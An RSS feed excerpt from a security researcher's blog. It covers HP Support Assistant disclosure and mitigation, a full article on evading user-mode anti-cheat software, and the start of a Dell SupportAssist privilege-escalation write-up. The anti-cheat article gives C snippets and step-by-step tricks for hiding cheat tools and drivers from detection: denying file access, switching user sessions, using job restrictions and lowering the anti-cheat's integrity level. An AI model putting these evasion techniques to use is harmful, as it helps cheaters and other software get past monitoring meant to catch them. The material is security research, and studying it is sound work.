Not much more to say about it.</p><h2 id="timeline">Timeline</h2><p>Here is a timeline of HP&apos;s response:</p><p>10/05/2019 - Initial report of vulnerabilities sent to HP.<br>10/08/2019 - HP PSIRT acknowledges receipt and creates a case.<br>12/19/2019 - HP PSIRT pushes an update and claims to have &quot;resolved the issues reported&quot;.<br>01/01/2020 - Updated report of unpatched vulnerabilities sent to HP.<br>01/06/2020 - HP PSIRT acknowledges receipt.<br>02/05/2020 - HP PSIRT schedules a new patch for the first week of March.<br>03/09/2020 - HP PSIRT pushes the scheduled patch to 03/21/2020 due to Novel Coronavirus complications.</p><h1 id="protecting-your-machine">Protecting your machine</h1><p>If you&apos;re wondering what you need to do to keep your HP machine safe from these vulnerabilities, it is critical that the software is either up to date or removed. HP Support Assistant <em>does not</em> have automatic updating by default unless you explicitly opt in (HP claims otherwise).</p><p>It is important to note that because HP has not patched three local privilege escalation vulnerabilities, even if you have the latest version of the software, you are still vulnerable unless you completely remove the agent from your machine (Option 1).</p><h2 id="option-1-uninstall">Option 1: Uninstall</h2><p>The best mitigation to protect against the attacks described in this article and future vulnerabilities is to remove the software entirely. This may not be an option for everyone, especially if you rely on the updating functionality the software provides; however, removing the software ensures that you&apos;re safe from any other vulnerabilities that may exist in the application.</p><p>For most Windows installations, you can use the &quot;<a href="https://support.microsoft.com/en-us/help/4028054/windows-10-repair-or-remove-programs">Add or remove programs</a>&quot; component of the Windows control panel to uninstall the service. 
There are two pieces of software to uninstall: one is called &quot;HP Support Assistant&quot; and the other is called &quot;HP Support Solutions Framework&quot;.</p><h2 id="option-2-update">Option 2: Update</h2><p>The next best option is to update the agent to the latest version. The latest update fixes several of the vulnerabilities discussed, except for three local privilege escalation vulnerabilities.</p><p>There are two ways to update the application. The recommended method is opening &quot;HP Support Assistant&quot; from the Start menu, clicking &quot;About&quot; in the top right, and pressing &quot;Check for latest version&quot;. Another method of updating is to install the latest version from HP&apos;s website <a href="https://www8.hp.com/us/en/campaigns/hpsupportassistant/hpsupport.html">here</a>.</p>]]></content:encoded></item><item><title><![CDATA[Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats]]></title><description><![CDATA[<p>The market for cheating in video games has grown year after year, incentivizing game developers to implement stronger anti-cheat solutions. 
A significant number of game companies have taken a rather questionable route, implementing more and more invasive anti-cheat solutions in a desperate attempt to combat cheaters, still ending up with</p>]]></description><link>https://billdemirkapi.me/insecure-by-design-weaponizing-windows-against-usermode-anticheats/</link><guid isPermaLink="false">6027707bd8acfdb32a877089</guid><category><![CDATA[Insecure by Design]]></category><category><![CDATA[Security Research]]></category><dc:creator><![CDATA[Bill Demirkapi]]></dc:creator><pubDate>Mon, 02 Dec 2019 15:05:00 GMT</pubDate><media:content url="https://billdemirkapi.me/content/images/2021/02/DNF8l7f-1.png" medium="image"/><content:encoded><![CDATA[<img src="https://billdemirkapi.me/content/images/2021/02/DNF8l7f-1.png" alt="Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats"><p>The market for cheating in video games has grown year after year, incentivizing game developers to implement stronger anti-cheat solutions. A significant number of game companies have taken a rather questionable route, implementing more and more invasive anti-cheat solutions in a desperate attempt to combat cheaters, still ending up with a game that has a large cheating community. This choice is understandable. A significant number of cheaters have now moved into the kernel realm, challenging anti-cheat developers to now design mitigations that combat an attacker who shares the same privilege level. However, not all game companies have followed this invasive path, some opting to use anti-cheats that reside in the <em>user-mode</em> realm.</p><p>I&apos;ve seen a significant number of cheaters approach user-mode anti-cheats the same way they would approach a kernel anti-cheat, often unknowingly making the assumption that the anti-cheat knows everything, and thus approaching them in an ineffective manner. 
In this article, we&apos;ll look at how to leverage our escalated privileges, as a cheater, to attack the insecure design these unprivileged solutions are built on.</p><h2 id="introduction">Introduction</h2><p>When attacking anything technical, one of the first steps I take is to try and put myself in the mind of a defender. For example, when I reverse engineer software for security vulnerabilities, putting myself in the shoes of the developer allows me to better understand the design of the application. Understanding the design behind the logic is critical for vulnerability research, as this often reveals points of weakness that deserve a dedicated look over. When it comes to anti-cheats, the first step I believe any attacker should take is understanding the scope of the application.</p><p>What I mean by scope is posing the question, <em>What can the anti-cheat &quot;see&quot; on the machine?</em> This question is incredibly important in researching these anti-cheats, because you may find blind spots on a purely design level. For user-mode anti-cheats, because they live in an unprivileged context, they&apos;re unable to access much and must be creative while developing detection vectors. Let&apos;s take a look at what access unprivileged anti-cheats truly have and how we can mitigate against it.</p><h2 id="investigating-detection-vectors">Investigating Detection Vectors</h2><h3 id="the-filesystem">The Filesystem</h3><p>Most access in Windows is restricted by the use of security descriptors, which dictate who has permissions on an object and how to audit the usage of the object.</p><p>For example, if a file or directory has the Users group in its security descriptor, i.e.:</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/5kA2q3f.png" class="kg-image" alt="Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats" loading="lazy"></figure><p>That means pretty much any user on the machine can access this file or directory. 
When anti-cheats are in an unprivileged context, they&apos;re strictly limited in what they can access on the filesystem, because they&apos;re unable to ignore these security descriptors. As a cheater, this provides the unique opportunity to abuse these security descriptors against them to stay under their radars.</p><p>Filesystem access is a large part of these anti-cheats&apos; capabilities because if you run a program with elevated privileges, the unprivileged anti-cheat cannot open a handle to that process. This is due to the difference between their elevation levels, but not being able to open the process is far from being game over. The first method anti-cheats can use to &quot;access&quot; the process is by just opening the process&apos;s file. More often than not, the security descriptor for a significant number of files will be accessible from an unprivileged context.</p><p>For example, typically anything in the &quot;Program Files&quot; directory in the C: drive has a security descriptor that permits READ and EXECUTE access to the Users group or allows the Administrators group FULL CONTROL on the directory. Since the Users group is permitted access, unprivileged processes are able to access files in these directories. This is relevant when you launch a cheating program such as Cheat Engine: one detection vector they have is just reading in the process&apos;s file and checking it for cheating-related signatures.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/O7LfoOt.png" class="kg-image" alt="Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats" loading="lazy"></figure><h3 id="nt-object-manager-leaks">NT Object Manager Leaks</h3><p>Filesystem access is not the only trick user-mode anti-cheats have. The next relevant access these anti-cheats have is a significant amount of query access to the current session. In Windows, sessions are what separates active connections to the machine. 
For example, you being logged into the machine is a session, and someone connected as another user via Remote Desktop has their own session too. Unprivileged anti-cheats can see almost everything going on in the session that the anti-cheat runs in. This significant access allows anti-cheats to develop strong detection vectors for a lot of different cheats.</p><p>Let&apos;s see what unprivileged processes can really see. One neat way to view what&apos;s going on in your session is with the <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/winobj">WinObj</a> Sysinternals utility. WinObj allows you to see a plethora of information about the machine without any special privileges.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/pJDBLhh.png" class="kg-image" alt="Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats" loading="lazy"></figure><p>WinObj can be run with or without Administrator privileges; however, I suggest using Administrator privileges during investigation, because sometimes you cannot &quot;list&quot; one of the directories above, but you can &quot;list&quot; sub-folders. For example, even for your own session, you cannot &quot;list&quot; the directory containing the BaseNamedObjects, but you can access it directly using the full path <code>\Sessions\[session #]\BaseNamedObjects</code>.</p><p>User-mode anti-cheat developers hunt for information leaks in these directories because the information leaks can be remarkably subtle. For example, a significant number of kernel tools expose a device for IOCTL communication. 
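</p><p>An anti-cheat can turn such a leak into a check with only a handful of lines: attempt to open the device and see whether it exists. A sketch of the technique, where the device name is a made-up example of the kind of entry a blacklist would contain:</p>

```c
#include <windows.h>
#include <stdio.h>

int main(void)
{
    /* Hypothetical blacklisted device name; real blacklists hold many. */
    const wchar_t *device = L"\\\\.\\NaughtyCheatDriver";

    HANDLE h = CreateFileW(device, 0, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (h != INVALID_HANDLE_VALUE || GetLastError() == ERROR_ACCESS_DENIED) {
        /* Either we opened it, or it exists but refused us; both
           confirm the device is present on the machine. */
        puts("blacklisted device detected");
        if (h != INVALID_HANDLE_VALUE) CloseHandle(h);
        return 1;
    }
    puts("device not present");
    return 0;
}
```

<p>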
Cheat Engine&apos;s kernel driver &quot;DBVM&quot; is a well-known example of this issue.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/0lbvmj0.png" class="kg-image" alt="Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats" loading="lazy"></figure><p>Since by default Everyone can access the Device directory, anti-cheats can simply check whether any device has a blacklisted name. More subtle leaks happen as well. For example, IDA Pro uses a mutex with a unique name, making it simple to detect when the current session has IDA Pro running.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/qKGfneB.png" class="kg-image" alt="Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats" loading="lazy"></figure><h3 id="window-enumeration">Window Enumeration</h3><p>A classic detection vector for all kinds of anti-cheats is enumerating windows for certain characteristics. Maybe it&apos;s a transparent window that&apos;s always the top window, or maybe it&apos;s a window with a naughty name. Windows provide a unique heuristic detection mechanism given that cheats often have some sort of GUI component.</p><p>To investigate these leaks, I used <a href="https://processhacker.sourceforge.io/">Process Hacker</a>&apos;s &quot;Windows&quot; tab, which shows what windows a process has associated with it. For example, coming back to the Cheat Engine example, there are plenty of windows anti-cheats can look for.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/0PKkcNF.png" class="kg-image" alt="Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats" loading="lazy"></figure><p>User-mode anti-cheats can enumerate windows via the <a href="https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumwindows">EnumWindows</a> API (or the API that EnumWindows calls), which allows them to enumerate every window in the current session. 
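</p><p>A minimal sketch of what such a window scan might look like; the blacklist entry here is illustrative, not taken from any real product:</p>

```c
#include <windows.h>
#include <wchar.h>
#include <stdio.h>

/* Called once per top-level window in the current session. */
static BOOL CALLBACK OnWindow(HWND hwnd, LPARAM lparam)
{
    wchar_t title[256] = L"";
    wchar_t cls[256] = L"";

    GetWindowTextW(hwnd, title, 256);
    GetClassNameW(hwnd, cls, 256);

    /* "Cheat Engine" as an illustrative blacklist entry. */
    if (wcsstr(title, L"Cheat Engine")) {
        wprintf(L"flagged window: %s (class %s)\n", title, cls);
        *(int *)lparam = 1;
    }
    return TRUE; /* keep enumerating */
}

int main(void)
{
    int flagged = 0;
    EnumWindows(OnWindow, (LPARAM)&flagged);
    return flagged;
}
```

<p>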
Anti-cheats can look for many things in a window, whether that be its class, its text, the process associated with it, etc.</p><h3 id="ntquerysysteminformation">NtQuerySystemInformation</h3><p>The next most lethal tool in the arsenal of these anti-cheats is <a href="https://www.geoffchappell.com/studies/windows/km/ntoskrnl/api/ex/sysinfo/query.htm">NtQuerySystemInformation</a>. This API allows even unprivileged processes to query a significant amount of information about what&apos;s going on in your computer.</p><p>There&apos;s too much data provided to cover all of it, but let&apos;s see some of the highlights of NtQuerySystemInformation.</p><ol><li>NtQuerySystemInformation with the class <code>SystemProcessInformation</code> provides a <a href="https://www.geoffchappell.com/studies/windows/km/ntoskrnl/api/ex/sysinfo/process.htm">SYSTEM_PROCESS_INFORMATION</a> structure, giving a wide variety of info about every process.</li><li>NtQuerySystemInformation with the class <code>SystemModuleInformation</code> provides a <a href="https://www.geoffchappell.com/studies/windows/km/ntoskrnl/api/rtl/ldrreloc/process_module_information.htm">RTL_PROCESS_MODULE_INFORMATION</a> structure, giving a wide variety of info about every loaded driver.</li><li>NtQuerySystemInformation with the class <code>SystemHandleInformation</code> provides a <a href="https://www.geoffchappell.com/studies/windows/km/ntoskrnl/api/ex/sysinfo/handle.htm">SYSTEM_HANDLE_INFORMATION</a> structure, giving a list of every open handle in the system.</li><li>NtQuerySystemInformation with the class <code>SystemKernelDebuggerInformation</code> provides a <a href="https://www.geoffchappell.com/studies/windows/km/ntoskrnl/api/ex/sysinfo/kernel_debugger.htm">SYSTEM_KERNEL_DEBUGGER_INFORMATION</a> structure, which tells the caller whether or not a kernel debugger is loaded (i.e. WinDbg KD).</li><li>NtQuerySystemInformation with the class <code>SystemHypervisorInformation</code> provides a <a 
href="https://www.geoffchappell.com/studies/windows/km/ntoskrnl/api/ex/sysinfo/hypervisor_query.htm">SYSTEM_HYPERVISOR_QUERY_INFORMATION</a> structure, indicating whether or not a hypervisor is present.</li><li>NtQuerySystemInformation with the class <code>SystemCodeIntegrityPolicyInformation</code> provides a <a href="https://www.geoffchappell.com/studies/windows/km/ntoskrnl/api/ex/sysinfo/codeintegrity.htm">SYSTEM_CODEINTEGRITY_INFORMATION</a> structure, indicating whether or not various code integrity options are enabled (i.e. Test Signing, Debug Mode, etc.).</li></ol><p>This is only a small subset of what NtQuerySystemInformation exposes, and it&apos;s important to remember these data sources while designing a secure cheat.</p><h2 id="circumventing-detection-vectors">Circumventing Detection Vectors</h2><p>Time for my favorite part. What&apos;s it worth if I just list all the possible ways for user-mode anti-cheats to detect you, without providing any solutions? In this section, we&apos;ll look over the detection vectors we mentioned above and see different ways to mitigate against them. First, let&apos;s summarize what we found.</p><ol><li>User-mode anti-cheats can use the filesystem to get a wide variety of access, primarily to access processes that are inaccessible via conventional methods (i.e. OpenProcess).</li><li>User-mode anti-cheats can use a variety of objects Windows exposes to get an insight into what is running in the current session and machine. 
Oftentimes there are hard-to-track information leaks that anti-cheats can use to their advantage, primarily because unprivileged processes have a lot of query power.</li><li>User-mode anti-cheats can enumerate the windows of the current session to detect and flag windows that match the attributes of blacklisted applications.</li><li>User-mode anti-cheats can utilize the enormous amount of data the NtQuerySystemInformation API provides to peer into what&apos;s going on in the system.</li></ol><h3 id="circumventing-filesystem-detection-vectors">Circumventing Filesystem Detection Vectors</h3><p>To restate the investigation section regarding filesystems, we found that user-mode anti-cheats could utilize the filesystem to gain access they otherwise would not have. How can an attacker evade filesystem-based detection routines? By abusing security descriptors.</p><p>Security descriptors are what truly dictate who has access to an object, and in the filesystem this becomes especially important in regard to who can read a file. If the user-mode anti-cheat does not have permission to read a file based on its security descriptor, then it cannot read that file. What I mean is: if you run a process as Administrator, preventing the anti-cheat from opening the process, and then remove access to the file, how can the anti-cheat read it? This method of abusing security descriptors allows an attacker to evade detections that involve opening processes through the filesystem.</p><p>You may feel wary when thinking about restricting unprivileged access to your process, but there are many subtle ways to achieve the same result. 
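</p><p>The blunt approach, for reference, is to add a deny ACE to the file&apos;s DACL yourself so the Users group loses read access. A sketch using the documented SetEntriesInAcl/SetNamedSecurityInfo pattern; the path is a placeholder and this must be run elevated:</p>

```c
#include <windows.h>
#include <aclapi.h>

int main(void)
{
    /* Hypothetical path to the binary we want to hide; run elevated. */
    wchar_t path[] = L"C:\\Tools\\naughty.exe";
    wchar_t group[] = L"Users";

    PACL oldDacl = NULL, newDacl = NULL;
    PSECURITY_DESCRIPTOR sd = NULL;
    EXPLICIT_ACCESSW deny;

    /* Read the file's current DACL. */
    if (GetNamedSecurityInfoW(path, SE_FILE_OBJECT,
            DACL_SECURITY_INFORMATION, NULL, NULL,
            &oldDacl, NULL, &sd) != ERROR_SUCCESS)
        return 1;

    /* Build a deny ACE for the Users group covering read/execute. */
    BuildExplicitAccessWithNameW(&deny, group,
        GENERIC_READ | GENERIC_EXECUTE, DENY_ACCESS, NO_INHERITANCE);

    /* Merge it ahead of the existing entries and apply the new DACL. */
    if (SetEntriesInAclW(1, &deny, oldDacl, &newDacl) == ERROR_SUCCESS)
        SetNamedSecurityInfoW(path, SE_FILE_OBJECT,
            DACL_SECURITY_INFORMATION, NULL, NULL, newDacl, NULL);

    if (newDacl) LocalFree(newDacl);
    if (sd) LocalFree(sd);
    return 0;
}
```

<p>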
Instead of directly setting the security descriptor of the file or folder, why not find existing folders that already have restricted security descriptors?</p><p>For example, the directory <code>C:\Windows\ModemLogs</code> already prevents unprivileged access.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/SfBoYaS.png" class="kg-image" alt="Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats" loading="lazy"></figure><p>The directory by default disallows unprivileged applications from accessing it, requiring at least Administrator privileges. What if you put your naughty binary in here?</p><p>Another trick to evade information leaks in places such as the Device directory or BaseNamedObjects directory is to abuse their security descriptors to block the anti-cheat&apos;s access. I strongly advise that you use a new sandbox account; with one, you can set the permissions of directories such as the Device directory to <strong>deny</strong> access to certain security principals.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/DNF8l7f.png" class="kg-image" alt="Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats" loading="lazy"></figure><p>Using security descriptors, we can block access to these directories to prevent anti-cheats from traversing them. All we need to do in the example above is run the game as this new user, and the anti-cheat will not have access to the Device directory. Since security descriptors control a significant amount of access in Windows, it&apos;s important to understand how we can leverage them to cut off anti-cheats from crucial data sources.</p><p>The solution of abusing security descriptors isn&apos;t perfect, but the point I&apos;m trying to make is that there is a lot of room for becoming undetected. 
Given that most anti-cheats have to deal with a mountain of compatibility issues, it&apos;s unlikely that most abuse would be detected.</p><h3 id="circumventing-object-detection-and-window-detection">Circumventing Object Detection and Window Detection</h3><p>I decided to include both Object and Window detection in this section because the circumvention can overlap. Starting with Object detection, especially when dealing with tools that you didn&apos;t create, understanding the information leaks a program has is the key to evading detection.</p><p>The examples brought up in the investigation were the Cheat Engine driver&apos;s device name and IDA&apos;s mutex. If you&apos;re using someone else&apos;s software, it&apos;s very important that you look for information leaks, primarily because it may not have been designed with preventing information leaks in mind.</p><p>For example, I was able to make <a href="https://github.com/mrexodia/TitanHide">TitanHide</a> undetected by several user-mode anti-cheat platforms by:</p><ol><li>Utilizing the previous filesystem trick to prevent access to the driver file.</li><li>Changing the pipe name of TitanHide.</li><li>Changing the log output of TitanHide.</li></ol><p>These steps are simple and not difficult to conceptualize. Read through the source code, understand the detection surface, and harden it. It can be as simple as changing a few names to become undetected.</p><p>When creating your own software that has the goal of combating user-mode anti-cheats, preventing information leaks should be a key step in designing the application. Understanding the internals of Windows can help a significant amount, because you can better understand the different types of leaks that can occur.</p><p>A generic circumvention for both object detection and window detection is the abuse of multiple sessions. The mentioned EnumWindows API can only enumerate windows <strong>in the current session</strong>. 
Unprivileged processes from one session <strong>can&apos;t access another session&apos;s objects</strong>. How do you use multiple sessions? There are many ways, but here&apos;s the trick I used to bypass a significant number of user-mode anti-cheats.</p><ol><li>I created a new user account.</li><li>I set the security descriptor of my naughty tools to be inaccessible by an unprivileged context.</li><li>I ran any of my naughty tools by switching users and running them as that user.</li></ol><p>Those three simple steps are what allowed me to use even the most common utilities such as Cheat Engine against some of the top user-mode anti-cheats. Unprivileged processes <strong>cannot access the processes of another user</strong> and they <strong>cannot enumerate any objects (including windows) of another session</strong>. By switching users, we&apos;re entering another session, significantly cutting off the visibility anti-cheats have.</p><p>A mentor of mine, <a href="https://twitter.com/aionescu">Alex Ionescu</a>, pointed out a different approach to preventing an unprivileged process from accessing windows in the current session. He suggested that you can put the game process into a job and then set the <code>JOB_OBJECT_UILIMIT_HANDLES</code> <a href="https://docs.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-jobobject_basic_ui_restrictions">UI restriction</a>. This would restrict any processes in the job from accessing &quot;USER&quot; handles of processes outside of the job, meaning that the user-mode anti-cheat could not access windows in the same session. The drawback of this method is that the anti-cheat could detect this restriction and could choose to crash/flag you. 
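</p><p>The job restriction described above might be set up roughly like this; the PID is a placeholder, and this is a sketch rather than a hardened implementation:</p>

```c
#include <windows.h>

int main(void)
{
    DWORD gamePid = 1234; /* hypothetical PID of the game process */
    JOBOBJECT_BASIC_UI_RESTRICTIONS ui = {0};
    HANDLE job, game;

    job = CreateJobObjectW(NULL, NULL);
    if (!job) return 1;

    /* Processes in the job may not use USER handles (windows included)
       owned by processes outside the job. */
    ui.UIRestrictionsClass = JOB_OBJECT_UILIMIT_HANDLES;
    if (!SetInformationJobObject(job, JobObjectBasicUIRestrictions,
                                 &ui, sizeof(ui)))
        return 1;

    /* AssignProcessToJobObject requires these access rights. */
    game = OpenProcess(PROCESS_SET_QUOTA | PROCESS_TERMINATE,
                       FALSE, gamePid);
    if (!game || !AssignProcessToJobObject(job, game))
        return 1;
    return 0;
}
```

<p>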
The safest method is generally not touching the process itself and instead evading detection using generic methods (i.e. switching sessions).</p><h3 id="circumventing-ntquerysysteminformation">Circumventing NtQuerySystemInformation</h3><p>Unlike the previous circumvention methods, evading NtQuerySystemInformation is not as easy. In my opinion, the safest way to evade detection routines that utilize NtQuerySystemInformation is to look at the different information classes that may impact you and ensure you do not have any unique information leaks through those classes.</p><p>Although NtQuerySystemInformation does give a significant amount of access, it&apos;s important to note that the data returned is often not detailed enough to be a significant threat to cheaters.</p><p>If you would like to restrict user-mode anti-cheat access to the API, there is a solution. NtQuerySystemInformation respects the integrity level of the calling process and significantly limits access to <a href="https://www.geoffchappell.com/studies/windows/km/ntoskrnl/api/ex/restricted_callers.htm">Restricted Callers</a>. These callers are primarily those who have a token below the medium integrity level. This sandboxing can allow us to limit a significant amount of the user-mode anti-cheat&apos;s access, but at the cost of a potential detection vector. 
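</p><p>Dropping a process to low integrity follows a documented Windows pattern: duplicate a token, stamp it with the low mandatory level SID <code>S-1-16-4096</code>, and create the process with it. A sketch with the target path as a placeholder and most error handling trimmed:</p>

```c
#include <windows.h>
#include <sddl.h>

int main(void)
{
    HANDLE token = NULL, lowToken = NULL;
    PSID lowSid = NULL;
    TOKEN_MANDATORY_LABEL label = {0};
    STARTUPINFOW si = { sizeof(si) };
    PROCESS_INFORMATION pi;
    wchar_t cmd[] = L"C:\\Game\\anticheat.exe"; /* hypothetical target */

    OpenProcessToken(GetCurrentProcess(),
                     TOKEN_DUPLICATE | TOKEN_QUERY | TOKEN_ADJUST_DEFAULT |
                     TOKEN_ASSIGN_PRIMARY, &token);
    DuplicateTokenEx(token, 0, NULL, SecurityImpersonation,
                     TokenPrimary, &lowToken);

    /* S-1-16-4096 is the low mandatory integrity level SID. */
    ConvertStringSidToSidW(L"S-1-16-4096", &lowSid);
    label.Label.Attributes = SE_GROUP_INTEGRITY;
    label.Label.Sid = lowSid;
    SetTokenInformation(lowToken, TokenIntegrityLevel, &label,
                        sizeof(label) + GetLengthSid(lowSid));

    /* Launch the target under the low-integrity copy of our token. */
    if (!CreateProcessAsUserW(lowToken, NULL, cmd, NULL, NULL, FALSE,
                              0, NULL, NULL, &si, &pi))
        return 1;
    return 0;
}
```

<p>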
The anti-cheat could choose to crash if it&apos;s run below medium integrity, which would stop this trick.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/7d2XNrn.png" class="kg-image" alt="Insecure by Design, Weaponizing Windows against User-Mode Anti-Cheats" loading="lazy"></figure><p>When at a low integrity level, processes:</p><ol><li>Cannot query handles.</li><li>Cannot query kernel modules.</li><li>Can only query other processes with equal or lower integrity levels.</li><li>Can still query if a kernel debugger is present.</li></ol><p>When testing with Process Hacker, I found that some games with user-mode anti-cheats simply crashed, perhaps because they received an ACCESS_DENIED error for one of their detection routines. An important reminder, as with the previous job-limit circumvention method: since this trick does directly touch the process, it is possible anti-cheats can simply crash or flag you for setting their integrity level. Although I would strongly suggest you develop your cheats in a manner that does not allow for detection via NtQuerySystemInformation, this sandboxing trick is a way of suppressing some of the leaked data.</p><h3 id="test-signing">Test Signing</h3><p>If I haven&apos;t yet convinced you that user-mode anti-cheats are easy to circumvent, it gets better. On all of the user-mode anti-cheats I tested, test signing was permitted, allowing essentially any driver to be loaded, including ones you create.</p><p>If we go back to our scope, drivers really only have a few detection vectors:</p><ol><li>User-mode anti-cheats can utilize NtQuerySystemInformation to get basic information on kernel modules. Specifically, the anti-cheat can obtain the kernel base address, the module size, the path of the driver, and a few other properties. 
You can view exactly what&apos;s returned in the definition of <a href="https://www.geoffchappell.com/studies/windows/km/ntoskrnl/api/rtl/ldrreloc/process_module_information.htm">RTL_PROCESS_MODULE_INFORMATION</a>. This can be circumvented by basic security practices, such as ensuring the data returned in RTL_PROCESS_MODULE_INFORMATION does not uniquely identify your driver, or by modifying the anti-cheat&apos;s integrity level.</li><li>User-mode anti-cheats can query the filesystem to obtain the driver contents. This can be circumvented by changing the security descriptor of the driver.</li><li>User-mode anti-cheats can hunt for information leaks by your driver (such as using a blacklisted device name) to identify it. This can be circumvented by designing your driver to be secure by design (unlike many of these anti-cheats).</li></ol><p>Circumventing the above checks will result in an undetected kernel driver. Preventing information leaks can be difficult; however, if you know what you&apos;re doing, you should understand which APIs may leak information accessible to these anti-cheats.</p><p>I hope I have taught you something new about combating user-mode anti-cheats and demystified their capabilities. User-mode anti-cheats come with the benefit of being a less invasive product that doesn&apos;t infringe on the privacy of players, but at the same time they are incredibly weak and limited. They can appear scary at first, given their usual advantage in detecting &quot;internal&quot; cheaters, but we must realize how weak their position truly is. Unprivileged processes are, as the name suggests, unprivileged. Stop wasting time treating these products as any sort of challenge; use the operating system&apos;s security controls to your advantage. 
User-mode anti-cheats have already lost; quit acting like they&apos;re any stronger than they really are.</p>]]></content:encoded></item><item><title><![CDATA[Local Privilege Escalation on Dell machines running Windows]]></title><description><![CDATA[<p>In May, <a href="https://d4stiny.github.io/Remote-Code-Execution-on-most-Dell-computers/">I published a blog post</a> detailing a Remote Code Execution vulnerability in Dell SupportAssist. Since then, my research has continued and I have been finding more and more vulnerabilities. I strongly suggest that you read my previous blog post, not only because it provides a solid conceptual understanding</p>]]></description><link>https://billdemirkapi.me/local-privilege-escalation-on-most-dell-computers/</link><guid isPermaLink="false">60276fded8acfdb32a87707e</guid><category><![CDATA[Security Research]]></category><dc:creator><![CDATA[Bill Demirkapi]]></dc:creator><pubDate>Fri, 19 Jul 2019 14:30:00 GMT</pubDate><media:content url="https://billdemirkapi.me/content/images/2021/02/dell_supportassist_home--1-.png" medium="image"/><content:encoded><![CDATA[<img src="https://billdemirkapi.me/content/images/2021/02/dell_supportassist_home--1-.png" alt="Local Privilege Escalation on Dell machines running Windows"><p>In May, <a href="https://d4stiny.github.io/Remote-Code-Execution-on-most-Dell-computers/">I published a blog post</a> detailing a Remote Code Execution vulnerability in Dell SupportAssist. Since then, my research has continued and I have been finding more and more vulnerabilities. 
I strongly suggest that you read my previous blog post, not only because it provides a solid conceptual understanding of Dell SupportAssist, but because it&apos;s a very interesting bug.</p><p>This blog post will cover my research into a Local Privilege Escalation vulnerability in <a href="https://www.dell.com/support/contents/us/en/04/article/product-support/self-support-knowledgebase/software-and-downloads/supportassist">Dell SupportAssist</a>. Dell SupportAssist is advertised to &quot;proactively check the health of your system&#x2019;s hardware and software&quot;. Unfortunately, Dell SupportAssist comes pre-installed on most new Dell machines running Windows. If you&apos;re on Windows, have never heard of this software, and have a Dell machine, chances are you have it installed.</p><h2 id="discovery">Discovery</h2><p>Amusingly enough, this bug was discovered while I was doing my write-up for the previous remote code execution vulnerability. To switch to previous versions of Dell SupportAssist, my method is to stop the service, terminate the process, replace the binary files with an older version, and finally start the service. Typically, I do this through a neat tool called <a href="https://processhacker.sourceforge.io/">Process Hacker</a>, which is a revamped version of the built-in Windows Task Manager. 
When I started the Dell SupportAssist agent, I saw this strange child process.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/Uk8JI3e.png" class="kg-image" alt="Local Privilege Escalation on Dell machines running Windows" loading="lazy"></figure><p>I had never noticed this process before, and instinctively I opened it to see if I could find more information about it.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/7Xk8kAc.png" class="kg-image" alt="Local Privilege Escalation on Dell machines running Windows" loading="lazy"></figure><p>We can tell straight away that it&apos;s a .NET application, given that the &quot;.NET assemblies&quot; and &quot;.NET performance&quot; tabs are populated. Browsing various sections of the process told us more about it. For example, the &quot;Token&quot; tab told us that this was an <em>unelevated</em> process running as the current user.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/0eRNqnO.png" class="kg-image" alt="Local Privilege Escalation on Dell machines running Windows" loading="lazy"></figure><p>While scrolling through the &quot;Handles&quot; tab, something popped out at me.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/DZP2yZS.png" class="kg-image" alt="Local Privilege Escalation on Dell machines running Windows" loading="lazy"></figure><p>For those who haven&apos;t used Process Hacker in the past, the cyan color indicates that a handle is marked as <em>inheritable</em>. There are plenty of processes that have inheritable handles, but the key part about this handle was the process name it was associated with. This was a THREAD handle to SupportAssist<em>Agent</em>.exe, not SupportAssist<em>AppWire</em>.exe. <code>SupportAssistAgent.exe</code> was the parent <code>SYSTEM</code> process that created SupportAssistAppWire.exe, a process running in an unelevated context. 
This wasn&apos;t that big of a deal either: a <code>SYSTEM</code> process may share a THREAD handle with a child process, even if it&apos;s unelevated, as long as it has restrictive permissions such as <code>THREAD_SYNCHRONIZE</code>. What I saw next is where the problem was evident.</p><figure class="kg-card kg-image-card"><img src="https://i.imgur.com/S61dPq2.png" class="kg-image" alt="Local Privilege Escalation on Dell machines running Windows" loading="lazy"></figure><p>This was no restricted THREAD handle that only allowed for basic operations; this was straight up a <strong>FULL CONTROL</strong> thread handle to <code>SupportAssistAgent.exe</code>. Let me try to put this in perspective. An <em>unelevated</em> process has a FULL CONTROL handle to a thread in a process running as <code>SYSTEM</code>. See the issue?</p><p>Let&apos;s see what causes this and how we can exploit it.</p><h2 id="reversing">Reversing</h2><p>Every day, Dell SupportAssist runs a &quot;Daily Workflow Task&quot; that performs several actions, typically to execute routine checks such as seeing if there is a new notification that needs to be displayed to the user. Specifically, the Daily Workflow Task will:</p><ul><li>Attempt to query the latest status of any cases you have open</li><li>Clean up the local database of unneeded entries</li><li>Clean up log files older than 30 days</li><li>Clean up reports older than 5 days (primarily logs sent to Dell)</li><li>Clean up analytic data</li><li>Register your device with Dell</li><li>Upload all your log files if it&apos;s been 30-45 days</li><li>Upload any past failed upload attempts</li><li>If it&apos;s been 14 days since the Agent was first started, <strong>issue an &quot;Optimize System&quot; notification</strong>.</li></ul><p>The important thing to remember is that all of these checks are performed on a <em>daily</em> basis. 
